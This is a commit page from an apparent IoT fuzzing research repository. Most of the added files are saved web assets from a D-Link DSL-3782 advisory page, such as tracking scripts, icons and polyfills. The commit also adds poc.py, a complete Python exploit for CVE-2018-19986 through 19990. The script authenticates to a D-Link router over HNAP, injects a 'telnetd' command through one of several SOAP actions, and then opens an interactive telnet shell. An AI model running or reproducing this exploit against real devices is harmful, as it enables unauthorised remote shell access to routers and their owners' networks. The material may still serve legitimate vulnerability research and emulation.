Skip to content

I
IOT-fuzz
Commit 69cbd3f3 by yinqidi
Options

experiment

parent 9ddf17a9
Showing with 174 additions and 0 deletions
Emulation/Experiment/D-Link DSL-3782 SecAdvisory_ OS Command Injection and Stored XSS_files/1(1).txt 0 → 100755
_ate.track.config_resp({"pc":"esb","tool-config":{"_default":{"widgets":{"h35n":{"hideEmailSharingConfirmation":false,"numPreferredServices":5,"widgetId":"h35n","creationTimestamp":1548498783649,"hideDevice":"none","position":"bottom-right","services":"twitter,linkedin,facebook,email,link,whatsapp","id":"esb","__hideOnHomepage":false,"hideLabel":false}}}},"subscription":{"active":true,"edition":"BASIC","tier":"basic","reducedBranding":false,"insightsEnabled":false},"customMessageTemplates":[],"pro-config":{"_default":{"widgets":{"esb":{"hideEmailSharingConfirmation":false,"numPreferredServices":5,"widgetId":"h35n","creationTimestamp":1548498783649,"hideDevice":"none","position":"bottom-right","services":"twitter,linkedin,facebook,email,link,whatsapp","id":"esb","__hideOnHomepage":false,"hideLabel":false}}}}});
\ No newline at end of file
Emulation/Experiment/D-Link DSL-3782 SecAdvisory_ OS Command Injection and Stored XSS_files/1.txt 0 → 100755
addthis.cbs.jsonp__287360183835307040({"loc":"MDAwMDBBU0pQMTMyMTU3MzE5ODAwMTAwMDBDSA==","pixels":[]});
\ No newline at end of file
Emulation/Experiment/D-Link DSL-3782 SecAdvisory_ OS Command Injection and Stored XSS_files/151.67aec2e0546e639563bb.js.下载 0 → 100755
atwpjp([151],{256:function(c,l){c.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M23.476 20.663c0-.324-.114-.6-.34-.825l-2.524-2.524a1.124 1.124 0 0 0-.826-.34c-.34 0-.63.13-.873.388.024.024.1.1.23.225s.217.212.26.26c.046.05.106.126.183.23a.976.976 0 0 1 .2.644c0 .325-.113.6-.34.827-.226.226-.5.34-.825.34-.12 0-.23-.015-.332-.043a.976.976 0 0 1-.31-.158 2.89 2.89 0 0 1-.23-.182 7.506 7.506 0 0 1-.26-.26l-.226-.23c-.267.25-.4.545-.4.885 0 .322.113.597.34.824l2.5 2.512c.218.218.493.328.825.328.323 0 .598-.106.825-.316l1.784-1.772a1.11 1.11 0 0 0 .34-.813zm-8.532-8.556c0-.323-.113-.598-.34-.825l-2.5-2.512a1.124 1.124 0 0 0-.825-.34c-.316 0-.59.11-.826.328L8.67 10.53a1.11 1.11 0 0 0-.34.813c0 .323.113.598.34.825l2.524 2.524c.22.22.494.328.825.328.34 0 .63-.126.873-.376-.024-.025-.1-.1-.23-.225a7.506 7.506 0 0 1-.26-.262 2.89 2.89 0 0 1-.183-.23.976.976 0 0 1-.2-.644c0-.323.113-.598.34-.825.226-.227.5-.34.824-.34a.976.976 0 0 1 .643.2c.106.077.183.137.23.182.05.044.137.13.262.26s.2.207.224.23c.267-.25.4-.545.4-.885zm10.862 8.556c0 .97-.344 1.792-1.032 2.464L22.99 24.9c-.67.67-1.492 1.006-2.463 1.006-.98 0-1.805-.344-2.476-1.032l-2.5-2.512c-.67-.67-1.006-1.493-1.006-2.463 0-.997.356-1.842 1.068-2.538l-1.068-1.068c-.696.712-1.538 1.068-2.525 1.068-.97 0-1.797-.34-2.476-1.02L7.02 13.82C6.34 13.138 6 12.314 6 11.343c0-.97.344-1.792 1.032-2.464l1.784-1.773c.67-.67 1.492-1.007 2.463-1.007.978 0 1.803.344 2.475 1.032l2.5 2.512c.67.67 1.007 1.492 1.007 2.463 0 .995-.356 1.84-1.068 2.537l1.068 1.068c.696-.712 1.537-1.068 2.524-1.068.97 0 1.797.34 2.476 1.02l2.524 2.523c.68.68 1.02 1.505 1.02 2.476z" fill-rule="evenodd"/></svg>'}});
atwpjp([151],{256:function(c,l){c.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M23.476 20.663c0-.324-.114-.6-.34-.825l-2.524-2.524a1.124 1.124 0 0 0-.826-.34c-.34 0-.63.13-.873.388.024.024.1.1.23.225s.217.212.26.26c.046.05.106.126.183.23a.976.976 0 0 1 .2.644c0 .325-.113.6-.34.827-.226.226-.5.34-.825.34-.12 0-.23-.015-.332-.043a.976.976 0 0 1-.31-.158 2.89 2.89 0 0 1-.23-.182 7.506 7.506 0 0 1-.26-.26l-.226-.23c-.267.25-.4.545-.4.885 0 .322.113.597.34.824l2.5 2.512c.218.218.493.328.825.328.323 0 .598-.106.825-.316l1.784-1.772a1.11 1.11 0 0 0 .34-.813zm-8.532-8.556c0-.323-.113-.598-.34-.825l-2.5-2.512a1.124 1.124 0 0 0-.825-.34c-.316 0-.59.11-.826.328L8.67 10.53a1.11 1.11 0 0 0-.34.813c0 .323.113.598.34.825l2.524 2.524c.22.22.494.328.825.328.34 0 .63-.126.873-.376-.024-.025-.1-.1-.23-.225a7.506 7.506 0 0 1-.26-.262 2.89 2.89 0 0 1-.183-.23.976.976 0 0 1-.2-.644c0-.323.113-.598.34-.825.226-.227.5-.34.824-.34a.976.976 0 0 1 .643.2c.106.077.183.137.23.182.05.044.137.13.262.26s.2.207.224.23c.267-.25.4-.545.4-.885zm10.862 8.556c0 .97-.344 1.792-1.032 2.464L22.99 24.9c-.67.67-1.492 1.006-2.463 1.006-.98 0-1.805-.344-2.476-1.032l-2.5-2.512c-.67-.67-1.006-1.493-1.006-2.463 0-.997.356-1.842 1.068-2.538l-1.068-1.068c-.696.712-1.538 1.068-2.525 1.068-.97 0-1.797-.34-2.476-1.02L7.02 13.82C6.34 13.138 6 12.314 6 11.343c0-.97.344-1.792 1.032-2.464l1.784-1.773c.67-.67 1.492-1.007 2.463-1.007.978 0 1.803.344 2.475 1.032l2.5 2.512c.67.67 1.007 1.492 1.007 2.463 0 .995-.356 1.84-1.068 2.537l1.068 1.068c.696-.712 1.537-1.068 2.524-1.068.97 0 1.797.34 2.476 1.02l2.524 2.523c.68.68 1.02 1.505 1.02 2.476z" fill-rule="evenodd"/></svg>'}});
\ No newline at end of file
Emulation/Experiment/D-Link DSL-3782 SecAdvisory_ OS Command Injection and Stored XSS_files/base.js.下载 0 → 100755
This source diff could not be displayed because it is too large. You can view the blob instead.
Emulation/Experiment/D-Link DSL-3782 SecAdvisory_ OS Command Injection and Stored XSS_files/fetch-polyfill.js.下载 0 → 100755
/*
/*
Copyright (c) 2014-2016 GitHub, Inc.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
(function(self){if(self.fetch)return;function normalizeName(name){if(typeof name!=="string")name=String(name);if(/[^a-z0-9\-#$%&'*+.\^_`|~]/i.test(name))throw new TypeError("Invalid character in header field name");return name.toLowerCase()}function normalizeValue(value){if(typeof value!=="string")value=String(value);return value}function Headers(headers){this.map={};if(headers instanceof Headers)headers.forEach(function(value,name){this.append(name,value)},this);else if(headers)Object.getOwnPropertyNames(headers).forEach(function(name){this.append(name,
headers[name])},this)}Headers.prototype.append=function(name,value){name=normalizeName(name);value=normalizeValue(value);var list=this.map[name];if(!list){list=[];this.map[name]=list}list.push(value)};Headers.prototype["delete"]=function(name){delete this.map[normalizeName(name)]};Headers.prototype.get=function(name){var values=this.map[normalizeName(name)];return values?values[0]:null};Headers.prototype.getAll=function(name){return this.map[normalizeName(name)]||[]};Headers.prototype.has=function(name){return this.map.hasOwnProperty(normalizeName(name))};
Headers.prototype.set=function(name,value){this.map[normalizeName(name)]=[normalizeValue(value)]};Headers.prototype.forEach=function(callback,thisArg){Object.getOwnPropertyNames(this.map).forEach(function(name){this.map[name].forEach(function(value){callback.call(thisArg,value,name,this)},this)},this)};function consumed(body){if(body.bodyUsed)return Promise.reject(new TypeError("Already read"));body.bodyUsed=true}function fileReaderReady(reader){return new Promise(function(resolve,reject){reader.onload=
function(){resolve(reader.result)};reader.onerror=function(){reject(reader.error)}})}function readBlobAsArrayBuffer(blob){var reader=new FileReader;reader.readAsArrayBuffer(blob);return fileReaderReady(reader)}function readBlobAsText(blob){var reader=new FileReader;reader.readAsText(blob);return fileReaderReady(reader)}var support={blob:"FileReader"in self&&"Blob"in self&&function(){try{new Blob;return true}catch(e){return false}}(),formData:"FormData"in self,arrayBuffer:"ArrayBuffer"in self};function Body(){this.bodyUsed=
false;this._initBody=function(body){this._bodyInit=body;if(typeof body==="string")this._bodyText=body;else if(support.blob&&Blob.prototype.isPrototypeOf(body))this._bodyBlob=body;else if(support.formData&&FormData.prototype.isPrototypeOf(body))this._bodyFormData=body;else if(!body)this._bodyText="";else if(support.arrayBuffer&&ArrayBuffer.prototype.isPrototypeOf(body));else throw new Error("unsupported BodyInit type");if(!this.headers.get("content-type"))if(typeof body==="string")this.headers.set("content-type",
"text/plain;charset=UTF-8");else if(this._bodyBlob&&this._bodyBlob.type)this.headers.set("content-type",this._bodyBlob.type)};if(support.blob){this.blob=function(){var rejected=consumed(this);if(rejected)return rejected;if(this._bodyBlob)return Promise.resolve(this._bodyBlob);else if(this._bodyFormData)throw new Error("could not read FormData body as blob");else return Promise.resolve(new Blob([this._bodyText]))};this.arrayBuffer=function(){return this.blob().then(readBlobAsArrayBuffer)};this.text=
function(){var rejected=consumed(this);if(rejected)return rejected;if(this._bodyBlob)return readBlobAsText(this._bodyBlob);else if(this._bodyFormData)throw new Error("could not read FormData body as text");else return Promise.resolve(this._bodyText)}}else this.text=function(){var rejected=consumed(this);return rejected?rejected:Promise.resolve(this._bodyText)};if(support.formData)this.formData=function(){return this.text().then(decode)};this.json=function(){return this.text().then(JSON.parse)};return this}
var methods=["DELETE","GET","HEAD","OPTIONS","POST","PUT"];function normalizeMethod(method){var upcased=method.toUpperCase();return methods.indexOf(upcased)>-1?upcased:method}function Request(input,options){options=options||{};var body=options.body;if(Request.prototype.isPrototypeOf(input)){if(input.bodyUsed)throw new TypeError("Already read");this.url=input.url;this.credentials=input.credentials;if(!options.headers)this.headers=new Headers(input.headers);this.method=input.method;this.mode=input.mode;
if(!body){body=input._bodyInit;input.bodyUsed=true}}else this.url=input;this.credentials=options.credentials||this.credentials||"omit";if(options.headers||!this.headers)this.headers=new Headers(options.headers);this.method=normalizeMethod(options.method||this.method||"GET");this.mode=options.mode||this.mode||null;this.referrer=null;if((this.method==="GET"||this.method==="HEAD")&&body)throw new TypeError("Body not allowed for GET or HEAD requests");this._initBody(body)}Request.prototype.clone=function(){return new Request(this)};
function decode(body){var form=new FormData;body.trim().split("&").forEach(function(bytes){if(bytes){var split=bytes.split("=");var name=split.shift().replace(/\+/g," ");var value=split.join("=").replace(/\+/g," ");form.append(decodeURIComponent(name),decodeURIComponent(value))}});return form}function headers(xhr){var head=new Headers;var pairs=xhr.getAllResponseHeaders().trim().split("\n");pairs.forEach(function(header){var split=header.trim().split(":");var key=split.shift().trim();var value=split.join(":").trim();
head.append(key,value)});return head}Body.call(Request.prototype);function Response(bodyInit,options){if(!options)options={};this.type="default";this.status=options.status;this.ok=this.status>=200&&this.status<300;this.statusText=options.statusText;this.headers=options.headers instanceof Headers?options.headers:new Headers(options.headers);this.url=options.url||"";this._initBody(bodyInit)}Body.call(Response.prototype);Response.prototype.clone=function(){return new Response(this._bodyInit,{status:this.status,
statusText:this.statusText,headers:new Headers(this.headers),url:this.url})};Response.error=function(){var response=new Response(null,{status:0,statusText:""});response.type="error";return response};var redirectStatuses=[301,302,303,307,308];Response.redirect=function(url,status){if(redirectStatuses.indexOf(status)===-1)throw new RangeError("Invalid status code");return new Response(null,{status:status,headers:{location:url}})};self.Headers=Headers;self.Request=Request;self.Response=Response;self.fetch=
function(input,init){return new Promise(function(resolve,reject){var request;if(Request.prototype.isPrototypeOf(input)&&!init)request=input;else request=new Request(input,init);var xhr=new XMLHttpRequest;function responseURL(){if("responseURL"in xhr)return xhr.responseURL;if(/^X-Request-URL:/m.test(xhr.getAllResponseHeaders()))return xhr.getResponseHeader("X-Request-URL");return}xhr.onload=function(){var status=xhr.status===1223?204:xhr.status;if(status<100||status>599){reject(new TypeError("Network request failed"));
return}var options={status:status,statusText:xhr.statusText,headers:headers(xhr),url:responseURL()};var body="response"in xhr?xhr.response:xhr.responseText;resolve(new Response(body,options))};xhr.onerror=function(){reject(new TypeError("Network request failed"))};xhr.open(request.method,request.url,true);if(request.credentials==="include")xhr.withCredentials=true;if("responseType"in xhr&&support.blob)xhr.responseType="blob";request.headers.forEach(function(value,name){xhr.setRequestHeader(name,value)});
xhr.send(typeof request._bodyInit==="undefined"?null:request._bodyInit)})};self.fetch.polyfill=true})(typeof self!=="undefined"?self:this);
Emulation/Experiment/D-Link DSL-3782 SecAdvisory_ OS Command Injection and Stored XSS_files/main.js.下载 0 → 100755
$(document).ready(function () {
$(document).ready(function () {
$('a.blog-button').click(function (e) {
if ($('.panel-cover').hasClass('panel-cover--collapsed')) return
currentWidth = $('.panel-cover').width()
if (currentWidth < 960) {
$('.panel-cover').addClass('panel-cover--collapsed')
$('.content-wrapper').addClass('animated slideInRight')
} else {
$('.panel-cover').css('max-width', currentWidth)
$('.panel-cover').animate({'max-width': '530px', 'width': '40%'}, 400, swing = 'swing', function () {})
}
})
if (window.location.hash && window.location.hash == '#blog') {
$('.panel-cover').addClass('panel-cover--collapsed')
}
if (window.location.pathname !== '/' && window.location.pathname !== '/index.html') {
$('.panel-cover').addClass('panel-cover--collapsed')
}
$('.btn-mobile-menu').click(function () {
$('.navigation-wrapper').toggleClass('visible animated bounceInDown')
$('.btn-mobile-menu__icon').toggleClass('icon-list icon-x-circle animated fadeIn')
})
$('.navigation-wrapper .blog-button').click(function () {
$('.navigation-wrapper').toggleClass('visible')
$('.btn-mobile-menu__icon').toggleClass('icon-list icon-x-circle animated fadeIn')
})
})
Emulation/Experiment/D-Link DSL-3782 SecAdvisory_ OS Command Injection and Stored XSS_files/moatframe.js.下载 0 → 100755
/*Copyright (c) 2011, 2019, Oracle and/or its affiliates. All rights reserved.*/
/*Copyright (c) 2011, 2019, Oracle and/or its affiliates. All rights reserved.*/
(function(){try{var l=function(b){var a=!0;try{b.domain}catch(f){a=!1}return a},r=function(b){return b.replace(/:/g,"%3A").replace(/=/g,"%3D").replace(/,/g,"%2C")},q=function(b){try{var a;var f=b.data;if("string"!==typeof f)a=!1;else{var c=f.match(new RegExp("([a-z]+)"+d+"([a-z0-9.-]+)"+d+"([0-9]+)"+d+"([a-z]+)"+d+"([0-9]+)"+d+"(.+)","i"));a=c&&7===c.length&&c[1]===m&&c[2]===n&&-1!==c[6].indexOf("check")?!0:!1}if(a){var p;var h=window.top&&window.top.location&&window.top.location.href;p=h&&("string"!==
typeof h?0:/^(?:https?:\/\/)?[^.:\/]+(?:\.[^.:\/]+)/.test(h))?h:!1;if(p){var t,e=window.top.location.hostname.replace("www.","")+window.top.location.pathname;"string"===typeof e&&"/"===e.charAt(e.length-1)&&(e=e.substr(0,e.length-1));if(t=e){var g=JSON.stringify({available:!1,fullUrl:r(p),cleanUrl:r(t),urlSrc:5}),g=g.replace(/"(\w+)"\s*:/g,"$1:"),l=b.data.split(d),q=[m,n,k,u,l[4]||k+1,g].join(d);b.source.postMessage(q,"*")}}}}catch(v){}},v=function(b,a){function f(c,b){var a=[];c&&a.push(c);b=b||
0;if(10<b||!c||!c.frames)return a;var d;try{d=isNaN(c.frames.length)?100:c.frames.length}catch(g){d=100}for(var e=0;e<d;e++)try{try{if(void 0==c.frames[e])break}catch(g){break}a=a.concat(f(c.frames[e],b+1))}catch(g){break}return a}return f(b,a)},w=function(){for(var b=[m,n,k,u,k+1,"ping"].join(d),a=v(window.top),f=0;f<a.length;f++)a[f]!==window.top&&a[f].postMessage(b,"*")},d="#",m="MSFAPI",n="1.2",u="addThis",k=Math.floor(Math.random()*Math.pow(10,12));window&&window.top&&l(window.top)&&!0!==window.top["__@@##MUH"]&&
(window.top.addEventListener("message",q),window.top["__@@##MUH"]=!0,w())}catch(b){}})();
Emulation/Experiment/Poc/CVE-2018-19986-19990/poc.py 0 → 100644
import requests
import telnetlib
from hashlib import md5
import time
import math
trans_5C = "".join(chr(x ^ 0x5c) for x in xrange(256))
trans_36 = "".join(chr(x ^ 0x36) for x in xrange(256))
blocksize = md5().block_size
def hmac_md5(key, msg):
if len(key) > blocksize:
key = md5(key).digest()
key += chr(0) * (blocksize - len(key))
o_key_pad = key.translate(trans_5C)
i_key_pad = key.translate(trans_36)
return md5(o_key_pad + md5(i_key_pad + msg).digest())
def HNAP_AUTH(SOAPAction, privateKey):
b = math.floor(int(time.time())) % 2000000000
b = str(b)[:-2]
h = hmac_md5(privateKey, b + '"http://purenetworks.com/HNAP1/' + SOAPAction + '"').hexdigest().upper()
return h + " " + b
poc_list = [['1', 'CVE-2018-19986', '/HNAP1/SetRouterSettings'],
['2', 'CVE-2018-19987', '/HNAP1/SetAccessPointMode'],
['3', 'CVE-2018-19988_1', '/HNAP1/SetClientInfoDemo'],
['4', 'CVE-2018-19988_2', '/HNAP1/SetClientInfoDemo'],
['5', 'CVE-2018-19989', '/HNAP1/SetQoSSettings'],
['6', 'CVE-2018-19990', '/HNAP1/SetWiFiVerifyAlpha']]
for i in poc_list:
print(i)
n = int(raw_input("select payload>>"))
poc = poc_list[n-1]
IP = raw_input("IP>>")
adminPw = raw_input("pw>>")
command = "telnetd" # command injection id
headers = requests.utils.default_headers()
headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
headers["SOAPAction"] = '"http://purenetworks.com/HNAP1/Login"'
headers["Origin"] = "http://" + IP
headers["Referer"] = "http://" + IP + "/info/Login.html"
headers["Content-Type"] = "text/xml; charset=UTF-8"
headers["X-Requested-With"] = "XMLHttpRequest"
payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Login xmlns="http://purenetworks.com/HNAP1/"><Action>request</Action><Username>Admin</Username><LoginPassword></LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
data = r.text
challenge = str(data[data.find("<Challenge>") + 11: data.find("</Challenge>")])
cookie = data[data.find("<Cookie>") + 8: data.find("</Cookie>")]
publicKey = str(data[data.find("<PublicKey>") + 11: data.find("</PublicKey>")])
privateKey = hmac_md5(publicKey + adminPw, challenge).hexdigest().upper()
password = hmac_md5(privateKey, challenge).hexdigest().upper()
headers["HNAP_AUTH"] = HNAP_AUTH("Login", privateKey)
headers["Cookie"] = "uid=" + cookie
payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Login xmlns="http://purenetworks.com/HNAP1/"><Action>login</Action><Username>Admin</Username><LoginPassword>'+password+'</LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
headers["Origin"] = "http://" + IP
headers["HNAP_AUTH"] = HNAP_AUTH(poc[2].split('/')[-1], privateKey)
headers["SOAPACTION"] = '"http://purenetworks.com{}"'.format(poc[2])
headers["Accept"] = "text/xml"
payload = open('{}.xml'.format(poc[1])).read().replace('ip', IP).replace('COMMAND', command)
print '[*] command injection'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
print(r.text)
print '[*] waiting 30 sec...'
time.sleep(30)
print '[*] enjoy your shell'
telnetlib.Telnet(IP).interact()
Emulation/Experiment/README.md 0 → 100644
https://github.com/pr0v3rbs/CVE
DSL:
https://xz.aliyun.com/t/6607
\ No newline at end of file
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment